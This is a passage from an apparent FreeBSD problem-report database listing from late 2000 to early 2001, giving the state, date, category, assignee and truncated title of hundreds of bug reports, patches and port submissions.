ipf/ipnat AFTER p o [2000/11/14] bin/22860 [PATCH] adduser & friends with '$' in use o [2000/11/14] docs/22861 doc newsyslog man page is misleading and inco o [2000/11/15] kern/22868 getsockname may return an incorrect addre o [2000/11/15] misc/22873 markm Perl's core'h conflicts with ncurses.h a [2000/11/16] misc/22885 dd /usr/share/misc/units.lib contains typo o [2000/11/16] bin/22897 su doesnt't compile without LOGIN_CAP def o [2000/11/16] i386/22900 patch: Adds Brand ID support to src/sys/i o [2000/11/16] kern/22905 Netgear FA311 Not supported. o [2000/11/17] misc/22914 bootinst messages are not updated s [2000/11/17] conf/22916 green Ssh/sshd binaries lacks kerberos support o [2000/11/17] bin/22933 green Typographical error in ssh.1 o [2000/11/18] i386/22940 Can't install 4.1.1 on ad0s2 if da0 exist o [2000/11/19] kern/22967 stallion driver (stl) shipped with FBSD 4 f [2000/11/20] ports/22970 ports New Port : textproc/py2html a [2000/11/20] i386/22971 marcel RealProducer doesn't work on linux emulat f [2000/11/20] ports/22995 grog Update port: x11-servers/x2x (fix ports/2 o [2000/11/21] bin/23008 df -k reports incorrect amount of disk ta o [2000/11/23] bin/23052 ghelmer [PATCH] rmuser fails to remove at jobs o [2000/11/23] ports/23060 steve lsof warning msg o [2000/11/23] conf/23063 [PATCH] for static ARP tables in rc.netwo o [2000/11/24] bin/23081 Touchpad on NEC Versa laptop is unusable o [2000/11/24] bin/23082 dwmalone ntpd has only one reference-clock parser o [2000/11/24] misc/23084 mount_nfs hangs self with some NFS server o [2000/11/25] bin/23097 Enhance WEP some more including ability t o [2000/11/25] kern/23099 jlemon tail -f from a fifo goes into a busy loop o [2000/11/26] misc/23118 static link-level route bug? o [2000/11/26] kern/23123 IP options reveal IPstealth mode. Just t o [2000/11/27] i386/23141 ad1816 audio driver produces noise. o [2000/11/27] misc/23148 getopt(3) works non-intuitively? o [2000/11/27] bin/23150 sscanf is used on a buffer that is not NU f [2000/11/28] ports/23151 ports NEW PORT : sysutils/wake-on-lan f [2000/11/28] ports/23172 jseger update cfengine port o [2000/11/29] bin/23178 'talk' not doing right thing o [2000/11/29] bin/23180 Certain KOI8 characters are treated as "w o [2000/12/01] bin/23204 length of salt in crypt() is not the same a [2000/12/02] ports/23232 ports gettext/xview port collision o [2000/12/02] bin/23233 kris Reincorporate /usr/bin/error in the FreeB o [2000/12/02] ports/23234 se port update request: xblast o [2000/12/03] bin/23254 yacc accepts bad grammer o [2000/12/04] ports/23259 asami Please remove the following redundant por f [2000/12/04] ports/23267 sada New port submittion: devel/lxr (lxr-0.3) o [2000/12/04] ports/23287 portmgr allow system-local patches for ports o [2000/12/04] docs/23292 doc /etc/dumpdates is not documented in secti o [2000/12/05] ports/23298 ports New port: lame-devel 3.87 o [2000/12/05] kern/23304 POSIX clock_gettime, clock_getres return o [2000/12/05] kern/23314 aic driver fails to detect Adaptec 1520B o [2000/12/06] bin/23321 [PATCH] reduce redundant code in /bin/cat o [2000/12/06] ports/23332 obrien urlview's url_handler.sh written in bash o [2000/12/06] misc/23339 roberto ntp version is 4.0.99b -- current version f [2000/12/06] ports/23341 billf ucd-snmp fails to build on -current o [2000/12/07] kern/23353 fcntl(F_GETLK) return l_pid equal to -1 f o [2000/12/07] i386/23359 Installation diskettes don't boot o [2000/12/07] misc/23362 tcpdump wrong on sppp CISCO_HDLC encoded o [2000/12/07] misc/23366 mmap() non conforming o [2000/12/07] gnu/23367 some src/gnu Makefiles are missing $FreeB o [2000/12/09] conf/23402 sysinstall upgrade ought to check partiti o [2000/12/09] ports/23410 obrien [PATCH] FreeBSD throws away information o o [2000/12/10] kern/23414 fail to probe my pnp modem o [2000/12/10] conf/23416 Adding SSL services and rsync into /etc/s o [2000/12/10] ports/23417 jmz [PATCH] XFree4-port needs patches to buil o [2000/12/10] conf/23419 'make buildkernel' doesn't work in isolat o [2000/12/10] kern/23446 billf ipfw fragment logging misses first frag o [2000/12/11] misc/23463 when the FreeBSD installation menu shows o [2000/12/11] bin/23472 obrien gdb weirdness on programs compiled with - o [2000/12/11] docs/23488 doc A manpage for section 7 regarding a Toron o [2000/12/11] kern/23493 race in 'make -jN buildkernel' pollutes / a [2000/12/12] ports/23499 ports [NEW PORT]: Two LaTeX macro package ports o [2000/12/12] ports/23504 jseger Small stylistic fix in ports/editors/emac o [2000/12/12] bin/23509 Augment dev_mkdb to allow different direc o [2000/12/13] kern/23520 sb0 old style audio support in 4.2-RELEAS a [2000/12/13] ports/23524 dougb New port: rdesktop - RDP client for Windo o [2000/12/13] bin/23526 Patch for bin/9529 (ftp completion cant h o [2000/12/13] misc/23539 marcel make installworld from nfs mounted /usr/s o [2000/12/14] ports/23543 imp Update net/socks5 to install sample confi o [2000/12/14] kern/23546 tanimura [PATCH] csa DMA-interrupt problem o [2000/12/14] docs/23559 doc missing manpage for hsearch libc function o [2000/12/14] ports/23560 portmgr linux-jdk/Makefile assumes default `patch o [2000/12/15] i386/23562 telnetd doesn't show message in file spec o [2000/12/15] ports/23581 portmgr Updates to bsd.port.mk to detect changing o [2000/12/17] gnu/23598 obrien Merge libgcc_r with libgcc o [2000/12/17] kern/23600 agp.ko module cannot be loaded o [2000/12/17] ports/23602 portmgr Recursive distclean for bsd.port.mk w/pat o [2000/12/18] misc/23612 patch for PicoBSD building (with diff) o [2000/12/18] ports/23634 ports QuakeForge --with-svga= not works o [2000/12/18] bin/23635 [PATCH] whois enhancement - smarter whois o [2000/12/19] i386/23643 dlopen() can't link to symbols in main pr o [2000/12/19] ports/23649 rse the port of mod_php4 does not install cor o [2000/12/19] ports/23660 ache Update russian/elm.language update pkg-pl o [2000/12/20] ports/23685 ports Fxtv always starts with apectlock true o [2000/12/20] kern/23692 GENERIC kernel config on 4.2 changes defa o [2000/12/20] kern/23700 AMD 756 Power Management Controller / SMB o [2000/12/21] bin/23710 [PATCH] there is no termcap(3) manpage pe o [2000/12/21] bin/23712 Unused variable CDB in /usr/src/usr.sbin/ f [2000/12/22] ports/23753 ports [PATCH] audio/mxv has unfetchable distfil o [2000/12/22] ports/23762 jseger Update port: misc/git to 4.3.20 o [2000/12/22] misc/23766 /etc/periodic/daily/440.status-mailq does a [2000/12/22] docs/23767 dd ifconfig(8) manual page does not document o [2000/12/22] kern/23768 I can't install sound driver in kernel o [2000/12/22] ports/23770 ports There is not an IPv6 + SSL lynx a [2000/12/22] ports/23780 ports New port (audio/ecawave): Simple graphica o [2000/12/24] kern/23814 .au sound files < 528 bytes actual data d o [2000/12/24] docs/23822 dgrimes mtree entries for German X11 man pages o [2000/12/27] ports/23893 max Update port: textproc/nfbtrans to 7.58 o [2000/12/28] bin/23908 repquota format fix o [2000/12/28] bin/23912 underflow of cnt in vs_paint() by O_NUMBE f [2000/12/28] ports/23937 nectar security/krb5 does not read /etc/login.co o [2000/12/29] bin/23944 Patch for ftpd to add a cd after the chro o [2001/01/01] kern/23989 NEW CODE: AMD 756 Power Management / SMBu o [2001/01/01] ports/24006 greid New port: httrack: An easy to use offline f [2001/01/02] ports/24021 ports New port: textproc/p5-Sort-PolySort (Gene o [2001/01/02] misc/24034 "CWD" discloses the full "real" path in a o [2001/01/02] docs/24035 doc ptrace(2) PT_STEP incorrect documentation o [2001/01/03] bin/24063 /bin/stty ek doesnt work despite man page o [2001/01/04] bin/24066 gdb can't detach from programs linked wit f [2001/01/04] ports/24071 trevor security/digest - md5,md4,sha1,ripemd160 o [2001/01/06] bin/24106 ftpd does not compile without virtual hos o [2001/01/06] ports/24120 portmgr "/usr/ports/Mk/bsd.port.mk", line 626: In o [2001/01/07] misc/24132 gdb output is wrong (same as #13427 ?) o [2001/01/07] kern/24141 emu10k1 has trouble playing non-44.1KHz s o [2001/01/08] i386/24150 network traffic appears bottlecaped. o [2001/01/08] ports/24163 grog ports/benchmarks/rawio checksum error o [2001/01/08] misc/24166 Allow Date to generate an RFC-822 Complia o [2001/01/08] ports/24167 sobomax pango fails to build on -current o [2001/01/09] ports/24207 jseger port "tcl83" cannot load shared objects o [2001/01/10] ports/24214 portmgr [PATCH] verbose 'make index' o [2001/01/10] ports/24216 ports new port: kde-i18n-pl o [2001/01/10] misc/24226 PicoBSD do not build on 5.0-current o [2001/01/10] bin/24230 getcwd(3) manual page has wrong STANDARDS a [2001/01/10] ports/24237 ports new port: kde-i18n-pl o [2001/01/11] ports/24259 steve port of open-motif on make install compla o [2001/01/11] misc/24261 pthread_mutex_lock/pthread_mutex_unlock d a [2001/01/11] ports/24262 ports new port: slrn-pl, slrn with polish langu o [2001/01/11] misc/24265 Linksys LNE100TX V.4.1 MAC address not de o [2001/01/11] ports/24267 andreas ghostscript6 port compilation fails o [2001/01/12] ports/24268 ade new port : gmp3 o [2001/01/12] kern/24269 Failure to setup DMA on ATA HDs (Alladin o [2001/01/12] ports/24292 portmgr update-patches target in ports/Mk/bsd.por o [2001/01/12] ports/24299 ports Configure the synaptics touchpad. s [2001/01/13] docs/24305 ben man page syscons has reference to non exi a [2001/01/14] misc/24324 Greek console support o [2001/01/15] misc/24345 jasone pthread library libc_r causes memory leak a [2001/01/15] i386/24351 setkey(8) man page has multiple spelling o [2001/01/15] ports/24361 asami wrong filemodes o [2001/01/16] ports/24374 dd New port: a display-based tetris game o [2001/01/16] misc/24384 4.1 Cant add entry to neighbour discovery o [2001/01/16] bin/24390 Replacing old dir-symlinks when using /bi o [2001/01/16] kern/24393 Patch to msdosfs to handle a kind of inco f [2001/01/16] ports/24395 ports Date object is not deserialized correct o [2001/01/17] ports/24408 ijliao new port : java2html o [2001/01/17] ports/24413 jseger Building ImageMagick port with libmalloc o [2001/01/17] ports/24417 ports skin support not working without unzip o [2001/01/18] docs/24434 ben cipher(3) man pages needs to state that - o [2001/01/18] bin/24435 Changing slice type causes Auto-partition a [2001/01/18] kern/24437 yokota syscons - MOUSE_MOUSECHAR fix o [2001/01/18] bin/24439 suggested replament for adduser(8) o [2001/01/18] bin/24444 syslogd(8) does not update hostname o [2001/01/19] ports/24451 mharo Portlint doesn't catch some literal comma o [2001/01/19] bin/24458 named-xfer executed at 20 priority level o [2001/01/20] bin/24485 [PATCH] to make cron(8) handle clock jump o [2001/01/20] ports/24493 msmith Pib maker function unable to launch xterm o [2001/01/20] conf/24495 Default /etc/printcap refers to wrong han a [2001/01/21] kern/24512 jesper Sent ICMP unreach when packet not for us o [2001/01/21] misc/24513 new options for pppd o [2001/01/21] conf/24515 Fix for find(1) warning in /etc/rc o [2001/01/21] kern/24516 Mouse Logitech M-S48 does not in FreeBSD o [2001/01/21] bin/24521 green ssh-agent exits when authenticating DSA v o [2001/01/22] kern/24528 Bad tracking of Modem status o [2001/01/22] bin/24540 add '-c' flag to src/bin/domainname to cl o [2001/01/22] ports/24558 torstenb Updated port: converters/recode - 3.5 o [2001/01/23] bin/24569 PATCH for PPPD o [2001/01/23] bin/24592 dmesg.boot Gets Overwritten without Reboo f [2001/01/24] misc/24603 dsp will not play .wav files at all o [2001/01/25] kern/24642 NEWCARD broken in RELENG-4 o [2001/01/25] kern/24647 Supported Gigabit Ethernet Interfaces for o [2001/01/25] ports/24651 mharo portlint gives a bogus warning o [2001/01/26] ports/24658 jkh Enhancement to src/release/Makefile a [2001/01/26] ports/24660 ports New port: Xerces-C 1.3.0 o [2001/01/26] docs/24662 doc too many questions about source managemen o [2001/01/26] alpha/24663 alpha Console output gets scribbled into /var/l o [2001/01/27] gnu/24681 gcc 2.95.3 cannot compile rince.c from IO o [2001/01/27] misc/24687 ports QUAKE FORGE & SVGALIB o [2001/01/28] ports/24692 ports setquota port is broken on 4.2 STABLE o [2001/01/28] kern/24696 compile error while defines DEB(x) a [2001/01/29] ports/24713 ports New port: xmotd - message-of-the-day brow o [2001/01/30] bin/24730 tail -f barfs on files bigger than 2 Gig o [2001/01/30] bin/24732 cmp can not compare files lager 2GB but s a [2001/01/30] ports/24736 ports New port: SGI's open inventor (graphics/i o [2001/01/30] bin/24742 send adduser.message before dirs are crea o [2001/01/30] ports/24743 chuckr a2ps port installs files in / o [2001/01/30] misc/24744 sys/socket.h uses u_char without includin o [2001/01/30] misc/24746 green SSH terminal hangs on large paste of data o [2001/01/30] ports/24747 ports new port: MicroEmacs 4.0/PK-TOY o [2001/01/30] ports/24749 dirk mysql323-server pkg-install script doesn' o [2001/01/31] ports/24756 billf net-snmp-4.2 does not compile with LPRng o [2001/01/31] bin/24757 ftpd not RFC compliant o [2001/02/01] conf/24781 MAKEDEV: rast* -> ast* a [2001/02/01] misc/24784 Why isn't bind always running as -u bind o [2001/02/01] docs/24786 doc missing FILES descriptions in sa(4) o [2001/02/02] docs/24797 phk when using MALLOC_DEFINE sys/param.h and a [2001/02/02] bin/24804 dd [PATCH] ps_showallprocs isn't documented. o [2001/02/03] kern/24827 Erratic Intellimouse Explorer in 4.1 and o [2001/02/03] bin/24828 [PATCH] ntpd compilation and additional r o [2001/02/03] docs/24839 doc fix ether.bridge o [2001/02/04] gnu/24844 gdb does not support kernel threads o [2001/02/04] ports/24845 tegge linuxthreads does not detect failed rfork o [2001/02/04] kern/24851 ISA PnP Modem Type is unregistered in sio a [2001/02/04] ports/24855 ade New port of FSF GMP library o [2001/02/04] bin/24857 File descriptor leak and frequent crashes o [2001/02/05] docs/24869 doc Some text elf.5 is duplicated o [2001/02/05] kern/24882 ktrace not syncing .out file before panic f [2001/02/05] ports/24885 ports Update Port: audio/icecast o [2001/02/06] kern/24900 Server logs:indfcntl(8, F_SETFL, 4): Inap o [2001/02/06] kern/24902 IPC Message Queue number to big o [2001/02/06] misc/24907 Options screen at MenuMedia menu problem o [2001/02/06] bin/24914 /dev explicitly referenced in MAKEDEV o [2001/02/06] docs/24921 phk Typo /devs --> /dev o [2001/02/06] docs/24923 doc 4.2 Release Errata page has no informatio o [2001/02/07] ports/24940 demon prolem with Tnm::icmp echo command due to o [2001/02/07] misc/24942 tftp client timeout failure o [2001/02/07] bin/24944 new execute-file can't running(not found o [2001/02/08] ports/24951 ports New port: devel/omniORB-Notify o [2001/02/08] bin/24953 green adduser ignores passwd_format in login.co o [2001/02/08] kern/24954 Old driver /src/sys/dev/sound/isa/sb.c sh o [2001/02/08] bin/24955 /usr/bin/tail -F in 4.1+ doesn't work if o [2001/02/08] kern/24959 jesper proper TCP_NOPUSH/TCP_CORK compatibility o [2001/02/08] i386/24963 perfmon(4) doesn't work on SMP systems o [2001/02/09] ports/24976 ports gemdropx port is missing a dependency on o [2001/02/09] ports/24983 asami Emacs ports have misleading names o [2001/02/10] ports/24987 nbm New port: Courier mail server. o [2001/02/10] ports/24991 ports New port: eudc-emacs20 o [2001/02/10] kern/24998 More verbose logging for Joliet CDs o [2001/02/11] docs/25000 doc matcd(4) SYNOPSIS is wrong o [2001/02/11] bin/25012 tar(1) as root does not preserve ownershi o [2001/02/11] bin/25013 mv(1) cannot move unresolvable symlinks a o [2001/02/11] bin/25015 cp: options -i and -f do not work as docu o [2001/02/11] docs/25016 doc symlink(7) manpage says symlinks have no o [2001/02/11] bin/25017 cp -pRP does not preserve symlink ownersh o [2001/02/11] kern/25018 lstat(2) returns bogus permissions on sym o [2001/02/11] kern/25019 Problem trying to build new kernel o [2001/02/12] ports/25031 ache www/apache: dbmmanage fails verifying md5 f [2001/02/12] ports/25033 bmah pkg_version -c to support packages? o [2001/02/12] kern/25039 -stable LINT missing the twe device o [2001/02/12] ports/25042 peter cvsup missed a couple of deletes in /usr/ o [2001/02/12] misc/25050 dwmalone inetd UDP echo service echos only 8K o [2001/02/12] misc/25055 Header in 'top' too long for SMP system a o [2001/02/13] bin/25059 dlopen(..,RTLD_GLOBAL) doesn't work for s o [2001/02/13] bin/25070 newsyslog(8) should send signals only onc o [2001/02/13] ports/25071 peter Ports-Skeletons gone after update o [2001/02/13] bin/25085 mlxcontrol utility fails silently if devi a [2001/02/13] ports/25087 ports new port: net/icq-transport a [2001/02/13] ports/25091 ports new port: net/yahoo-transport o [2001/02/15] misc/25109 Fujitsu MO device MCC3064AP could't be c o [2001/02/15] ports/25119 sobomax pango does not build on -current o [2001/02/16] docs/25134 doc Kernel USER_LDT option help incomplete o [2001/02/16] misc/25147 [PATCH] to make D-Link DFE-650 work with o [2001/02/16] ports/25154 ports atmel AVR microcontroller in-circuit prog o [2001/02/16] misc/25161 During install, after boot get message: P o [2001/02/17] docs/25164 ben makewhatis(1) seems to be fouling up o [2001/02/17] ports/25169 wosch [PATCH] update of p5-libwww port 1.62 -> a [2001/02/17] ports/25177 ports New port: java/jdbcpool-current o [2001/02/19] misc/25217 user with login 'connected' shows bogus f o [2001/02/19] misc/25218 peter mailwrapper invokes sendmail when resourc f [2001/02/19] ports/25219 ports New port: plist-builder o [2001/02/19] conf/25223 darrenr PATCH for rc.network to enable ipnat sepe a [2001/02/20] docs/25239 doc fdp-primer/tools/chapter.sgml says about o [2001/02/20] bin/25241 luigi ipfw shouldn't show dynamics rules when s o [2001/02/21] ports/25251 dima acroread4 uses hard coded path for lpr f [2001/02/21] bin/25263 green openssh and /etc/login.access does not wo o [2001/02/21] bin/25267 vmstat displays some parameters incorrect o [2001/02/21] bin/25273 add fs type feature to vnconfig(8) to all o [2001/02/21] kern/25275 X server freezes system randomly on pentu o [2001/02/22] bin/25278 bs accepts -s -c but not -sc o [2001/02/22] alpha/25284 alpha PC164 won't reboot with graphics console o [2001/02/23] ports/25297 kevlo kcontrol writes wrong variable names in c o [2001/02/23] ports/25299 kevlo kdm´s "Console mode" command isn´t meanin o [2001/02/23] ports/25313 wosch Script source displayed at http://www.nl. o [2001/02/24] ports/25342 ports saint: user authentication fails in remot o [2001/02/25] ports/25351 ports x11/colorsel fails to build o [2001/02/25] misc/25354 Slovak (sk_SK) locale missing o [2001/02/25] kern/25369 Miscellaneous CD drivers have potentially o [2001/02/26] misc/25378 kris update contrib/libgmp to newer version (3 o [2001/02/26] kern/25386 cg Incorrect mixer registers (line & synth) o [2001/02/26] docs/25392 doc Chapter 9 pages could use 'location of fu o [2001/02/26] docs/25405 doc misleading warning from catman(1), etc. o [2001/02/27] ports/25419 ports Difficulties installing print/teTeX port o [2001/02/27] docs/25420 doc man page missing important information. o [2001/02/27] docs/25437 doc kernel configs are the only precious file f [2001/02/27] i386/25442 cg T20 CS4624/CS4297a sound problems: "pcm0: o [2001/02/27] ports/25444 andreas gimp-print driver out of date in ghostscr o [2001/02/27] kern/25445 kernel statistics are displayed in wrong o [2001/02/28] ports/25448 ports mpmf20 fails to correctly display the dir o [2001/02/28] docs/25450 doc remove NCPU from docs f [2001/02/28] misc/25454 rlogin does not pass the DISPLAY environm o [2001/02/28] gnu/25459 Dumpvalue.pm says SYNOPSYS instead of SYN o [2001/02/28] bin/25462 daemon(3) fails if called by a session le o [2001/02/28] i386/25463 PS/2 mouse sync problems with KVM switch o [2001/02/28] bin/25470 ancontrol doesn't output TX rate o [2001/03/01] conf/25472 add bg_BG.CP1251 locale support o [2001/03/01] bin/25474 dump can't close fifo pipe correctly o [2001/03/01] bin/25477 billf pam_radius fix to allow null passwords fo o [2001/03/02] ports/25490 wosch [PATCH] fix various bugs in stat(1) a [2001/03/02] conf/25495 keichii missing et_EE.ISO_8859-15 locale a [2001/03/02] misc/25499 buffer paste functionality from keyboard o [2001/03/02] docs/25500 ben Update of ip(4) manpage to reflect curren o [2001/03/02] misc/25502 TFTP in libstand(3) fails on all transact o [2001/03/03] kern/25507 cg contribute Intel ICH sound driver o [2001/03/03] kern/25517 ARP cache timeout behavior can be improve o [2001/03/04] kern/25521 Laptop with FreeBSD4.2 freezes in battery o [2001/03/04] conf/25527 jdp `man ldconfig' does not reflect its behav o [2001/03/04] ports/25530 torstenb ports/net/cricket port does dependencies o [2001/03/04] ports/25531 portmgr INSTALL_* macros fail for non-root users a [2001/03/05] ports/25560 ports New port: ftp/kbear: An ftp client for KD f [2001/03/05] ports/25562 ports [UPDATE] net/radiusd-cistron o [2001/03/05] alpha/25564 alpha Port ups-debug doesn't build on the alpha o [2001/03/06] kern/25566 [PATCH] Missing PCI Id's for DLink DFE-53 o [2001/03/06] bin/25572 sshd core dump o [2001/03/06] ports/25576 jmz XFree86-4 port installs manual pages with s [2001/03/06] kern/25582 paul lnc driver uses wrong driver name s [2001/03/07] bin/25584 arp.c - better printed ether address o [2001/03/07] bin/25587 Add Solaris-like functionality to truss(1 o [2001/03/07] bin/25598 patch to let ftpd output message when cha o [2001/03/08] docs/25606 keichii Incorrect Email Lists on Website a [2001/03/08] kern/25608 sos ATA CD-ROM is not recognized on IBM Netfi s [2001/03/09] bin/25627 will Cannot append hash after .elif in Makefil a [2001/03/09] kern/25634 I obtain kernel trap 9 with interrupts di o [2001/03/09] misc/25635 gad lpr -# didn't work on network printer o [2001/03/09] ports/25643 ports "incompatible pointer" in RgbSink.c for x o [2001/03/10] docs/25648 doc typos in some manpages (dependant) o [2001/03/10] bin/25654 minor style(9) fix for sleep o [2001/03/10] docs/25657 doc no netid(5) man page a [2001/03/11] ports/25698 ports [PATCH] Update lopster port to 0.9.8 a [2001/03/11] ports/25704 ports www/webstone - change maintainer o [2001/03/11] ports/25708 ports pine4 port hard-code /usr/local/include o [2001/03/11] ports/25710 ports New port: news/slrn-pl, slrn with polish o [2001/03/11] bin/25723 green OpenSSH on 4.2 excessively regenerates RS o [2001/03/12] bin/25724 quota(1) outputs wrong limits about NFS q o [2001/03/12] conf/25730 [PATCH] mount_mfs is being phased out -> o [2001/03/12] kern/25733 mismatch between error reporting in smbus o [2001/03/12] docs/25735 doc error in handbook o [2001/03/12] bin/25736 ac -d option probrem with overdays logon o [2001/03/12] bin/25754 PicoBSD uses broken vnconfig syntax o [2001/03/12] ports/25763 shige XV fails to refresh properly on image dis o [2001/03/13] ports/25773 ports omniORB-Notify update to 3.0.3 o [2001/03/13] kern/25777 atime not updated on exec o [2001/03/13] ports/25779 portmgr (patch) make fetch-list should list all m o [2001/03/13] i386/25782 cg CSA sound device repeated sound o [2001/03/13] bin/25786 ume Misdeclared IPv6 macros. o [2001/03/13] bin/25787 dwmalone inetd/auth: -i option to return uid inste o [2001/03/14] gnu/25794 markm [PATCH] make perl use a decent random num o [2001/03/14] bin/25798 adduser does full *pwd.db rebuild, instea o [2001/03/14] conf/25809 /etc/default/rc.conf bad default ipfilter o [2001/03/14] ports/25815 portmgr [PATCH] Port build collision fix. o [2001/03/15] ports/25828 torstenb The devel/autoconf port won't install ins o [2001/03/15] conf/25829 IPSec config in rc.network doesn't allow f [2001/03/15] bin/25833 LOG_FAC() is bogus o [2001/03/15] docs/25836 ben erroneous comment in statfs manual page o [2001/03/15] bin/25837 docs [PATCH] properly document vfc_flags in ge a [2001/03/16] bin/25850 peter CRON shouts o [2001/03/16] misc/25853 jlemon ftpd eats all memory o [2001/03/16] kern/25866 more than 256 ptys, up to 1302 ptys. f [2001/03/16] docs/25875 gshapiro the mailstats(8) header has the wrong sec o [2001/03/16] docs/25876 doc typos in jail.2 o [2001/03/17] ports/25878 tegge error during compilation of linuxthreads o [2001/03/18] docs/25892 doc doc.html.mk: use OpenJade on alpha a [2001/03/18] bin/25895 keichii Add Big5 multibyte support for tcsh o [2001/03/18] kern/25905 cg Sound failed o [2001/03/18] ports/25906 sf nethack-gtk refuses to run s [2001/03/18] ports/25907 roam Firebird shared libs not added to shared o [2001/03/18] kern/25909 4.x kernel freezes on P3-Asus CUSL2-C mot o [2001/03/18] kern/25910 cg Kernel sound driver may die if a program o [2001/03/18] ports/25911 ports flash plugin for freebsd netscape 4.7 cra o [2001/03/19] conf/25914 added more modules to /boot/defaults/load o [2001/03/19] misc/25917 green Paste thrue SSH Secure Shell v.2.4.0 (bui o [2001/03/19] docs/25919 doc supported hardware list says 'no' for Sou o [2001/03/19] kern/25923 vm_map.h defines a macro called "min_offs o [2001/03/19] conf/25925 Add service sgi_fam to /etc/rpc o [2001/03/20] misc/25946 Add support for Topic chipset PCI modem o [2001/03/21] i386/25978 Problem with 'moused' or XFree86-4.03 and o [2001/03/21] kern/25980 "ARCHIVE Python 06408-XXX 8130" needs qui a [2001/03/21] ports/25983 ports New port: databases/py-bsddb3 o [2001/03/21] misc/25984 bsd.prog.mk doesn't link C++ programs pro o [2001/03/21] docs/25985 ben some small fixes in raycontrol.8 o [2001/03/22] ports/25993 ports New port editors/gnuserv-emacs20 o [2001/03/22] docs/26001 doc typo in sched_get_priority_max.2 f [2001/03/22] docs/26003 doc getgroups(2) lists NGROUPS_MAX but not sy o [2001/03/22] bin/26005 MIME quoted-printable encoding added to v o [2001/03/22] docs/26006 doc Changing zone(9) man page o [2001/03/22] bin/26012 FTPD utmp logging support o [2001/03/22] kern/26016 VMWare is crash on SMP machine o [2001/03/23] misc/26035 System hangs when playing mp3 on PCI Maes o [2001/03/23] ports/26039 ports The port of tidy dumped core o [2001/03/24] ports/26058 billf textproc/htdig simplifications and separa o [2001/03/24] docs/26060 doc No man page for /etc/host.conf o [2001/03/25] docs/26065 mpp assorted broken "SEE ALSO" references o [2001/03/25] bin/26080 [PATCH] various RPC fixes o [2001/03/25] docs/26090 mpp more broken "SEE ALSO" references o [2001/03/26] ports/26092 ports ksh93 port not installing properly o [2001/03/26] ports/26104 billf PORT UPDATE: add ${FREETYPE_CONFIG} suppo o [2001/03/26] docs/26137 wosch update for BSD family tree o [2001/03/27] conf/26145 [PATCH] There is no make.conf equivalent o [2001/03/27] bin/26152 ps compat4x should include librsaINTL.so o [2001/03/27] misc/26153 sed G does not double space o [2001/03/27] ports/26154 ports databases/firebird doesn't compile o [2001/03/28] misc/26187 jkh setting nonInteractive in install.cfg is o [2001/03/28] ports/26192 ports apel appeared both in xemacs/site-package o [2001/03/28] docs/26194 doc BSD Family Tree needs updated o [2001/03/29] ports/26200 ports Update port: devel/py-coro o [2001/03/29] bin/26201 telnet SRA password exchange trap when no o [2001/04/01] i386/26272 Adds a sysctl to get the cpu frequency a [2001/04/01] ports/26274 ports New port: Perl/TK Jabber client o [2001/04/01] kern/26277 ppc driver doesn't work with port 0x3BC p o [2001/04/02] docs/26286 doc *printf(3) etc should gain format string a [2001/04/02] ports/26292 ports New port: Version 3 of Squeak, the Smallt o [2001/04/02] kern/26295 mount of Olympus Digital Camera via umass a [2001/04/02] ports/26297 ports New port: devel/florist o [2001/04/02] ports/26303 adrian Wrong permission on Squid24's errors dire a [2001/04/03] ports/26313 ports New Port: german/eagle: A tool for design o [2001/04/03] kern/26316 Booting FreeBSD on VMware2 with 2 or 3 et o [2001/04/03] kern/26317 /modules not created by make installkerne o [2001/04/03] misc/26323 Quota system create zero-length files o [2001/04/03] kern/26324 Defaults for NFS mounts over TCP are slow o [2001/04/03] ports/26336 foxfair Update security/acid o [2001/04/03] ports/26339 adrian squid-2.4_2, ipcCreate: $PREFIX/libexec/s o [2001/04/04] i386/26347 [pcvt] incorrect screen number in HP mode o [2001/04/04] kern/26348 [pcvt] scon -s, page fault in HP mode o [2001/04/04] bin/26359 [PATCH] a minor nit in how netstat detect o [2001/04/05] ports/26372 ports ImageMagick 5.3.0 Port doesn't build when o [2001/04/05] misc/26373 Rpc.statd implements the SM_NOTIFY call b o [2001/04/06] bin/26375 markm PAMized su allows non-wheel members to su o [2001/04/06] misc/26378 All 4.X-Release and 4.3rc2 Panics Install o [2001/04/06] kern/26385 VMWare reboots entire system after starti o [2001/04/06] ports/26387 ports numerous fixes and improvements to micq-0 o [2001/04/07] ports/26401 orion ports/mbone/rat update o [2001/04/07] conf/26420 addition of a serial 3-wire entry into ge o [2001/04/08] ports/26436 kris dejasearch port should be marked broken o [2001/04/08] kern/26437 Kernel Panics on SMP box when subjected t a [2001/04/08] ports/26447 ports New Port: net/py-xmlrpc o [2001/04/08] docs/26451 doc ctype.h defined functions are not accurat o [2001/04/09] kern/26454 mixer volume settings on Maestro-2E (Diam o [2001/04/09] ports/26455 ports New port: games/conquest: A multiplayer c o [2001/04/09] bin/26468 pkg_delete clears dependencies after runn f [2001/04/10] ports/26472 ports Update of the jed port to a newer version o [2001/04/10] ports/26478 will KDE2.1 - Kpresenter & Kmediaplayer Crash o [2001/04/10] conf/26488 incomplete named sandbox information o [2001/04/10] docs/26489 doc incomplete info in the ppp faq about "PPP a [2001/04/12] kern/26508 dd [PATCH] syscons panic in userconfig mode o [2001/04/12] misc/26509 dd [PATCH] Obscure sysinstall NULL dereferen o [2001/04/12] ports/26511 ports New port: mail/emh-emacs20,emh-xemacs21-m o [2001/04/12] misc/26521 Australia's whois.aunic.net as an option a [2001/04/13] ports/26530 ports New port: editors/ted: An easy to use ric f [2001/04/13] bin/26531 sysinstall's disk labeler creates too sma a [2001/04/13] docs/26532 green ".Ql ?" becomes "`'?" through nroff (and a [2001/04/13] kern/26534 Add an option to ipfw to log gid/uid of w o [2001/04/13] ports/26542 will kscd - part of KDE2.1.1 as package for 4. f [2001/04/13] ports/26544 ports Update of AucTeX port o [2001/04/13] kern/26546 Add ioctl support to linux emulation and o [2001/04/13] kern/26547 "lnc" problem with shared memory mode wit o [2001/04/13] ports/26551 jseger Update port: graphics/pstoedit to 3.21 o [2001/04/13] i386/26562 /dev/lpt0 returns EBUSY when attempting t o [2001/04/14] kern/26563 ioctl(SNDCTL_DSP_SPEED) returns -1 when f o [2001/04/14] misc/26573 tcsh incorrectly handles 'postcmd' o [2001/04/14] docs/26574 doc Incorrect link in individual ports README o [2001/04/14] misc/26583 jkh sysinstall display problem if >7 partitio o [2001/04/14] kern/26584 kernel boot messages aren't logged correc o [2001/04/15] bin/26602 RELENG_4 ssh/sshd modifies the 'erase' ch o [2001/04/16] kern/26608 when boot Freebsd 4.2 Release from the c o [2001/04/16] kern/26618 unmount(2) can't unmount a filesystem who a [2001/04/16] ports/26628 ports New port: audio/qtecasound, well done o [2001/04/17] misc/26636 If /etc/ttys goes empty, init(8) never re o [2001/04/17] bin/26637 